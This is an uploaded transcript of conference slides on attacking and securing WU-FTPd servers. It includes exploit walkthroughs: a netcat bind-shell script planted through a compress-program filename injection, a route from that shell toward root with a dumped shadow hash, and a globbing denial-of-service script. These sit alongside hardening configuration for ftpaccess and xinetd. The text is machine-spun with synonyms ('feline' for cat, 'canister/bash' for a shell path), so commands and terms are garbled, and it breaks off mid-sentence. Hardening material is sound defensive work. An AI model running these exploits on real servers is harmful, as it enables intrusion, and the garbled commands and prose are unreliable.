Assaulting and Securing Unix FTP Servers .

Uploaded on:
Attacking and Securing Unix FTP Servers. Jay Beale President, JJB Security Consulting Lead Developer, Bastille Linux. Contents. Simple: Working exploits against WU-FTPd Configuring WU-FTPd against attack Defeated exploits against WU-FTPd
Slide 1

Assaulting and Securing Unix FTP Servers Jay Beale President, JJB Security Consulting Lead Developer, Bastille Linux

Slide 2

Contents Simple: Working adventures against WU-FTPd Configuring WU-FTPd against assault Defeated endeavors against WU-FTPd Where we have working endeavors, we\'ll concentrate on show as opposed to address.

Slide 3

FTP Conversion Vulnerability Not a support flood! Utilizes the "tar documents up for me" highlight in WU-FTPd. Target: WU-FTPd 2.4.x - 2.6.0 (RH <=6.2, SuSE <=7.3, Immunix <=6.2) (

Slide 4

Preparing to Exploit $ feline > script #!/receptacle/bash nc - l –p 6666 –e/canister/bash <CTRL-D> $ tar - cf b.tar nc script $ feline >blah # tar - xf b.tar ./script <CTRL-D>

Slide 5

Exploiting… $ csh $ reverberate > \'- - utilize pack program=bash blah\' $ ftp target (login as client) ftp> put b.tar ftp> put blah ftp> put "— utilize pack program=bash blah" ftp> get "utilize pack program=bash blah".tar

Slide 6

Remote shell $ nc target 6666 We have a remote shell with the benefits of the client we signed in as. On the off chance that we need a rootshell, we simply carry a benefit elevator with us… (Credits to SUID and Securiteam)

Slide 7

Rootshell? $ tar - cf b.tar nc script ftp target (login as same client) ftp> put b.tar ftp> get "- - utilize pack program=bash blah".tar $ nc target 6666 ./ userrooter by S grep root/and so forth/shadow root:$1$MU.tGav3$X8WISNGV92c.Oxfe0pvqb1:11870:0:99999:7:- 1:- 1:134538460

Slide 8

Joy. This endeavor is harder to pull off on an unknown login, however conceivable. It\'s harder to pull off, for the most part since we\'re chrooted without far to go, with just client ftp. We can utilize this to safeguard typical client get to.

Slide 9

Avoidance We can maintain a strategic distance from this adventure by designing the FTP daemon to forbid tar-ring/pressure. We can likewise ensure that mysterious clients can\'t recover the records that they put on the server. Documents to be downloaded again ought to likely be analyzed independently. At long last, we\'ll take a gander at a way channel later in this discussion.

Slide 10

Sample/and so on/ftpaccess class real,guest,anonymous * email root@localhost message /welcome.msg login message .message cwd=* pack yes all tar yes all chmod no guest,anonymous delete no guest,anonymous overwrite no guest,anonymous rename no guest,anonymous log transfers anonymous,real inbound,outbound passwd-check rfc822 caution

Slide 11

Deactivating tar, pack… We can keep away from this adventure by designing the FTP daemon to refuse tar-ring/pressure in/and so on/ftpaccess: pack no all tar no all chmod no unknown delete no mysterious overwrite no unknown rename no mysterious

Slide 12

Anonymous Upload? Unknown transfer is sufficiently risky. We can reduce the hazard incredibly. To begin with, set great perms: mkdir/home/ftp/approaching chown root.root/home/ftp/approaching chmod 333/home/ftp/approaching chmod a-w/home/ftp

Slide 13

Anonymous Upload? Second, arrange default authorizations for every single approaching document, by means of/and so forth/ftpaccess: Upload/home/ftp/approaching yes root ftp 0600 nodirs Noretrieve/home/ftp/approaching

Slide 14

FTP globbing Vulnerability 1 Denial of Service #!/container/bash=20 ftp - n FTP-SERVER<<\end=20 quot client mysterious canister quot pass ls/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 end=20 (

Slide 15

FTP globbing Vulnerability 1 Targets: WU-FTPd <=2.6.0 (RH 6.2,SuSE 7.3) ProFTPd <=1.2.1 Other targets: MacOS 10.0.0, 10.0.1 Solaris 8 HP-UX 11.11 (11i)

Slide 16

Avoidance/Containinment We can prevent this from assuming control over the framework by putting great asset restrains in. We\'ll likewise take a gander at a way channel in the FTP daemon setup.

Slide 17

FTP globbing Vulnerability #2 WU-FTPd 2.6.1 had a pile defilement defenselessness in the globbing code.

Slide 18

FTP globbing Vulnerability #2 Targets: WU-FTPd <=2.6.1 RH 7.2, SuSE 7.3, Mdk 8.1 Exploit is accepted to be available for use, yet not publically accessible.

Slide 19

Testing Vulnerability 220 rh72 FTP server (Version wu-2.6.1-18) prepared. Name ( unknown 331 Guest login alright, send your total email address as secret key. Secret key: 230 Guest login alright, get to confinements apply. Remote framework sort is UNIX. Utilizing parallel mode to exchange records. ftp> ls ~{ 227 Entering Passive Mode (127,0,0,1,116,136) 421 Service not accessible, remote server has shut association

Slide 20

Avoidance This is in the globbing code, which we can\'t stop. There are no authorizations keeps an eye on documents or different settings that we can change. Since a verified session is required, the best way to evade this is to keep the aggressor from signing in.

Slide 21

Containment If we\'re running just an unknown FTP server, we can set inetd/xinetd to dependably run it as client ftp , driving anybody signing into get just client ftp and to conceivably get stuck in a chroot.

Slide 22

Site_Exec WU-FTPd had a genuine configuration string powerlessness in the SITE EXEC usefulness. Indeed, even from basic unknown get to, this got all of you the best approach to root.

Slide 23

Site_Exec Targets: WU-FTPd <= 2.6.0 RH <= 6.2,SuSE <= 7.3 HP-UX <= 11.11 (11i)

Slide 24

Avoidance? SITE EXEC can\'t be deactivated. Be that as it may, there is trust. On the off chance that you just need WU-FTPd for unknown transfer/download, set inetd/xinetd to run in.ftpd as the ftp client, rather than root.

Slide 25

Avoidance? /and so forth/xinetd.d/wu-ftpd benefit ftpd { socket_type = stream hold up = no User = ftp … } inetd.conf ftp stream tcp nowait ftp/usr/sbin/tcpd in.ftpd –l - a

Slide 26

Containment Chrooting won\'t stop the aggressor if he\'s root. Root can break out of chroots on numerous working frameworks. Try not to believe the application to drop benefit – attempt to never give it additional benefit to drop.

Slide 27

Message Buffer Overflow WU-FTPd alternatively offers messages when you login, change registry, trigger a mistake condition,… As an element, these can incorporate various "enchantment treats," which WU-FTPd will substitute for, as: %R – customer hostname %N – number of clients in a class

Slide 28

Message Buffer Overflow There\'s a support flood condition in WU-FTPd\'s treatment of these. Is this a danger?

Slide 29

Are we powerless? On the positive side, most destinations don\'t utilize these naturally. Of course, how about we take a gander at a well known default/and so on/ftpaccess document: # Messages showed to the client message/welcome.msg login .message cwd=* Problem: if an aggressor can keep in touch with any catalog that doesn\'t have a .message record yet, he wins. (Detect the other one?)

Slide 30

Avoidance We can keep away from this by not giving an aggressor a chance to keep in touch with any catalog. On the off chance that this isn\'t conceivable, we can square him from keeping in touch with any document that starts in a "." Finally, we can ensure that the FTP zone has great consents on its root catalog.

Slide 31

Avoidance way channel unknown/and so on/blunder ^[-A-Za-z0-9\._]*$ ^\. ^-For any record to get past, it must match the main example and not coordinate any of the accompanying. Take note of that this stops both the message abuse here and the prior tar vuln.

Slide 32

More Avoidance We can likewise expel every one of the messages from our setup document, however this is troublesome, since they\'re inescapable. At last, we can ensure that unknown clients can\'t transfer records. In the event that we have genuine clients, however, it gets troublesome.

Slide 33

More Avoidance # Removing messages from/and so forth/ftpaccess $ grep –v message/and so forth/ftpaccess >/and so on/ $ mv/and so on/ so forth/ftpaccess

Slide 34

Containment Avoidance is truly better here, yet we can attempt to contain the harm. We can contain the harm by running an unknown just FTP server, set by inetd/xinetd to dependably keep running as a non-root client. Keep in mind, mysterious FTP is naturally chrooted.

Slide 35

Additional Measures Log more, by adding this to ftpaccess: log security anonymous,guest,real log summons anonymous,guest,real And include "genuine" to the rundown of clients for whom we log exchanges.

Slide 36

Go Beyond ftpusers The customary method for ensuring that lone genuine people utilized ftp, and not framework records, was to occasionally ensure all non-people were in/and so on/ftpusers. Presently, simply do this in ftpaccess: deny-uid %-499 (replace 499 w/max non-human deny-gid %-499 uid/gid here) permit uid ftp permit gid ftp

Slide 37

Worms and Autorooters On top of this, there are worms, mass rooters and auto rooters which consequently filter for and misuse vulnerabilities. The HoneyNet extend had a framework examined and traded off by a worm inside 92 seconds of it coming on the web.

Slide 38

Ramen Worm Most of the worms give up knowledge for speed. Ramen filters FTP server standards for construct dates. Try not to give away the data and this worm won\'t attempt to assault.

Slide 39

Minimizing Your Banner In WU-FTPd\'s/and so on/ftpaccess, include/change line: welcoming laconic 220 target.server FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) prepared. Name ( gets to be: 220 FTP server prepared. Name (

Slide 40

Choosing Your Own Banner Then once more, that makes it less demanding to spot WU-FTPd for a saavy aggressor. In this way, make your own particular line! welcoming content FTP Server Here 220 FTP Server here Name (

Slide 41

Alternatives to WU-FTPd You can likewise stay away from the torment of attempting to evade or contain all the ftpd root vulns. ProFTPd has a somewhat better security history. OpenBSD\'s ftpd has an awful security history.

Slide 42

vsftpd really has never had a security i

View more...